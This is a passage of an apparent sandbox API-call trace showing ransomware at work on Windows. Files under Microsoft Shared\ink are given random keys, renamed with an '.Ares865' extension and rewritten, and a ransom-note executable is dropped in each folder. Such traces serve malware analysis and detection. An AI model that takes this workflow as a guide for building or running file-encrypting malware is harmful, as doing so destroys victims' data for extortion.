CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.182] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.184] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.Ares865") returned 89 [0077.184] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.ares865"), dwFlags=0x1) returned 1 [0077.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.184] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3166) returned 1 [0077.185] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.185] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.185] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.190] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.191] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.191] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.191] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.Ares865") returned 90 [0077.191] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.ares865"), dwFlags=0x1) returned 1 [0077.192] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.193] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=738) returned 1 [0077.193] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.197] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.197] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.197] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.198] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.Ares865") returned 90 [0077.198] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.ares865"), dwFlags=0x1) returned 1 [0077.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.199] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=804) returned 1 [0077.199] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.200] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.200] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.205] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.206] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.206] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.Ares865") returned 90 [0077.206] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.ares865"), dwFlags=0x1) returned 1 [0077.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.208] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=488) returned 1 [0077.208] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.209] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.211] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.212] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.Ares865") returned 90 [0077.212] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.ares865"), dwFlags=0x1) returned 1 [0077.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.213] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=617) returned 1 [0077.213] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.217] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.218] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.Ares865") returned 87 [0077.218] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.ares865"), dwFlags=0x1) returned 1 [0077.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.220] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16616) returned 1 [0077.220] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.224] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.225] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.Ares865") returned 87 [0077.225] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.ares865"), dwFlags=0x1) returned 1 [0077.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.234] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=15097) returned 1 [0077.234] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.238] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.238] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.238] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.239] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.Ares865") returned 93 [0077.239] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.ares865"), dwFlags=0x1) returned 1 [0077.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.240] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9803) returned 1 [0077.241] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.241] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.241] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.244] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.244] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.244] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.245] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.Ares865") returned 89 [0077.245] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.ares865"), dwFlags=0x1) returned 1 [0077.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.246] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11067) returned 1 [0077.246] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.249] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.250] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.250] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.251] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.Ares865") returned 93 [0077.251] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.ares865"), dwFlags=0x1) returned 1 [0077.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.252] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10947) returned 1 [0077.252] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.252] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.252] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.256] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.257] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" [0077.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cff70 | out: hHeap=0x2b0000) returned 1 [0077.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0077.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 71 [0077.257] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" [0077.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.260] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f8d4c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f8d4c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.261] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.Ares865") returned 86 [0077.261] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.ares865"), dwFlags=0x1) returned 1 [0077.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=384) returned 1 [0077.263] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.266] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.266] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.267] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.Ares865") returned 94 [0077.267] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.268] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1118) returned 1 [0077.269] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.269] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.269] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.275] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.281] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.281] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.307] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" 